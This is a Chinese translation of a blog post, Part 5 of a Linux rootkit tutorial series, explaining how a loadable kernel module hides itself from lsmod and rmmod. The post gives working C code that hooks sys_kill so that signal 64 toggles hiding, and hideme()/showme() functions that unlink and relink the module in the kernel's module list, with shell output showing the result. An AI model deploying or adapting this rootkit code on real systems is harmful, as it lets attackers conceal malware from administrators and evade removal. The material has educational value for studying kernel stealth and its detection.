５从用户空间隐藏内核模块＿Linux＿Rootkit．md

Xcellerator

密码学Linux其他逆向工程

Linux Rootkit 第 5 部分：从用户空间隐藏内核模块

2020-09-17 :: TheXcellerator

# linux # rootkit #隐形 #链表

到目前为止，我们已经了解了如何充分利用挂钩系统调用和常规函数。但是，考虑到这是一个关于 rootkit 的系列，我们确实应该对隐秘性进行一些考虑。如果您一直在跟踪，那么一旦您加载了任何以前的 Rootkit，只需检查lsmod.

$ lsmod | grep rootkit
rootkit                16384  0

复制

很明显，对吧？但是，我听到你说，这是一个从内核请求信息的用户空间工具！我们当然可以操纵它来忽略我们的小内核模块吗？！如果那是你，那么你就完全正确了。

内核中的链表

好的，计算机科学部分入站！如果您已经熟悉链表的概念，那么您可以安全地跳过几段。

链接列表是一种跟踪同一对象的多个实例的方法。理解它们的最好方法可能是通过例子：

struct my_object {
    int value;
    struct my_object *next, *prev;
}

复制

如果这是您第一次看到这样的东西，请再读一遍 - 如果它看起来有点奇怪，那是因为它有点奇怪！结构体的定义my_object是递归的，但 C 仍然可以理解它。我们称其为链表的原因是因为列表中的每个条目都包含指向下一个和上一个条目的指针。列表中的每一项都不知道自己在大局中的位置，只知道谁在前面，谁在后面。

一个非常简单的链表可能如下所示：

struct my_object entry1, entry2, entry3;

entry1.prev = NULL;
entry1.next = &entry2;

entry2.prev = &entry1;
entry2.next = &entry3;

entry3.prev = &entry2;
entry3.next = NULL;

复制

我们这样做的原因是我们不必在包含所有列表条目的地方保留索引！每个项目只需要知道接下来的内容和之前的内容（并将指针保留为NULL第一个/最后一个）。这意味着我们可以简单地通过修改几个next和prev指针来添加/删除/插入一个新项目 - 而无需关心内存中是否有足够的空间或是否需要调整数组大小。

内核大量使用链表。看看include/linux/types.h，我们看到：

struct list_head {
    struct list_head *next, *prev;
};

复制

my_object这与我们进一步定义结构的方式相同！我们还有一些非常简单的list_add()函数list_del，稍后我们也会使用它们。他们所做的正是你所想的——他们从链接列表中添加和删除项目！

val请注意，在上面的内核源代码片段中，结构中没有条目或类似内容。这是因为，在整个内核的规模上，将list_head结构作为字段包含在另一个结构中，该结构保存我们链接在一起的对象，更容易且更易于管理。结构中的结构！

跟踪内核中的模块

每个加载的内核模块都有一个THIS_MODULE为其设置并可用的对象。我们可以通过查看以下内容看到这一点include/linux/export.h：

#ifdef MODULE
extern struct module __this_module;
#define THIS_MODULE (&__this_module)
#else
#define THIS_MODULE ((struct module *)0)
#endif

复制

无论哪种方式，THIS_MODULE都被定义为指向结构的指针module。让我们看一下include/linux/module.h

struct module {
    enum module_state state;

    /* Member of list of modules */
    struct list_head list;

    /* Unique handle for this module */
    char name[MODULE_NAME_LEN];

    /* More stuff we aren't interested in... */
};

复制

在这里我们看到那里有结构，list_head这意味着我们有一个链表！next事实上，在我们的内核模块中，我们可以通过查看指向和模块的指针来找出列表中哪些模块在我们之前/之后prev。作为一个具体的例子，尝试这个简单的模块使用该list_entry()功能。当我们加载它时，我们会看到（在我的系统上）：

$ sudo insmod rootkit.ko
$ dmesg
[12956.924033] rootkit: Loaded >:-)
[12956.924034] rootkit: next kernel module = ufs
[12956.924034] rootkit: prev kernel module =

复制

为什么prev模块名称为空？仅仅是因为它rootkit是列表中的第一个模块！检查lsmod（它按照加载的模块在链表中出现的顺序循环）的输出，我们可以看到情况确实如此：

$ lsmod | head -n 5
Module                  Size  Used by
rootkit                16384  0
ufs                    81920  0
qnx4                   16384  0
hfsplus               110592  0

复制

编写内核模块

有了这些知识，我们就可以开始将我们的 Rootkit 组合在一起了。使用与第 3 部分中相同的技术，我们将进行挂钩sys_kill()，以便我们可以发送虚假64信号来切换隐藏或显示的模块。此功能将包含我们需要编写的两个新函数；适当命名hideme()和showme()。

首先，系统调用挂钩（像往常一样，我只会描述pt_regs挂钩的版本 - 请参阅第 2 部分了解更多信息，或者在此处查看最终完成的 rootkit ）。我们将使用一个全局定义的hidden变量来实现隐藏和显示之间的切换（这也意味着我们只需实现一个新信号而不是两个！）。

static short hidden = 0;

asmlinkage int hook_kill(const struct pt_regs *regs)
{
    void showme(void);
    void hideme(void);

    int sig = regs->si;

    if ( (sig == 64) && (hidden == 0) )
    {
        printk(KERN_INFO "rootkit: hiding rootkit!\n");
        hideme();
        hidden = 1;
    }
    else if ( (sig == 64) && (hidden == 1) )
    {
        printk(KERN_INFO "rootkit: revealing rootkit!\n");
        showme();
        hidden = 0;
    }
    else
        return orig_kill(regs);
}

复制

如果您一直在关注本系列中的其他帖子，那么希望这段代码对您来说非常简单。像往常一样，这个 rootkit 的核心并不在于钩子本身，而是在于showme()和hideme()函数。因为我们从“revealed”开始，hideme()总是会在之前被调用showme()，所以让我们先看看这个。

我们不能只是从列表中删除我们的模块并完成 - 否则我们将无法将其添加回来！我们必须在移除自己之前保存当前所处的位置，以便showme()稍后可以将我们带回正确的位置。为此，我们引入另一个全局变量，但这次是一个指向list_head我们将调用的结构的指针prev_module。一旦我们保存了list.prev这个全局指针的条目，我们就可以继续安全地使用 删除自己list_del()。

static struct list_head *prev_module;

void hideme(void)
{
    prev_module = THIS_MODULE->list.prev;
    list_del(&THIS_MODULE->list);
}

复制

容易，对吧？我们应该感谢内核开发人员使用!list_中定义的所有这些宏使我们的生活变得如此轻松。include/linux/list.h值得注意的是，它THIS_MODULE仍然在内存中 - 我们所做的只是操纵链接列表中的指针以跳过它。

有了这个在手，showme()就更简单了。因为我们已经保存了prev_module，所以就像使用list_add()将自己重新插入一样简单：

void showme(void)
{
    list_add(&THIS_MODULE->list, prev_module);
}

复制

将所有内容放在一起

hook_kill()如果您自己一直在遵循，那么现在是使用 ftrace 和其他声明（不使用）完成系统调用挂钩的好时机pt_regs。或者，您可以像往常一样在repo上找到工作源代码。lsmod构建并加载模块后，再次查看并注意rootkit其中的内容：

$ lsmod | grep rootkit
rootkit                16384  0

复制

现在继续64向任何 pid 发送信号并再次检查：

$ kill -64 1
$ lsmod | grep rootkit
$

复制

没有什么！我们可以检查输出dmesg以查看我们的模块仍在运行：

$ dmesg
[15107.466554] rootkit: Loaded >:-)
[15109.982025] rootkit: hiding rootkit kernel module...

复制

如果我们尝试卸载模块怎么办？

$ sudo rmmod rootkit
rmmod: ERROR: ../libkmod/libkmod-module.c:799 kmod_module_remove_module() could not remove 'rootkit': No such file or directory
rmmod: ERROR: could not remove module rootkit: No such file or directory

复制

它找不到它！这是因为rmmod循环遍历模块链接列表中的每一项，寻找与name我们提供的项相匹配的项。因为我们不在列表中，所以找不到我们！再次向某个地方发送信号64会让我们回来并让我们卸载模块。

$ kill -64 1
$ sudo rmmod rootkit
$ dmesg
[15107.466554] rootkit: Loaded >:-)
[15109.982025] rootkit: hiding rootkit kernel module...
[15252.183065] rootkit: revealing rootkit kernel module...
[15255.439374] rootkit: Unloaded :-(

复制

现在我们开始了 - 现在您可以从用户空间隐藏您的 rootkit！值得指出的是，这是一层非常薄的混淆。事实上，我们的 Rootkit 仍在运行，这意味着我们仍在内存中，任何形式的内存分析或具有远程能力的 DFIR 专业人员都会很快发现我们（特别是使用“rootkit”之类的名称四处走动！）。

希望你喜欢这个 - 直到下一次…

阅读其他帖子

---

←Linux Rootkit 第 6 部分：隐藏目录Linux Rootkit 第 4 部分：通过干扰 Char 设备为 PRNG 添加后门→

哈维菲利普斯 2020 - 伦敦, 英国:: panr制作的主题

该网站是闹鬼网络的一部分

.io/posts/linux_rootkits_06/)Linux Rootkit 第 4 部分：通过干扰 Char 设备为 PRNG 添加后门→

哈维菲利普斯 2020 - 伦敦, 英国:: panr制作的主题

该网站是闹鬼网络的一部分

<<< 随机 >>>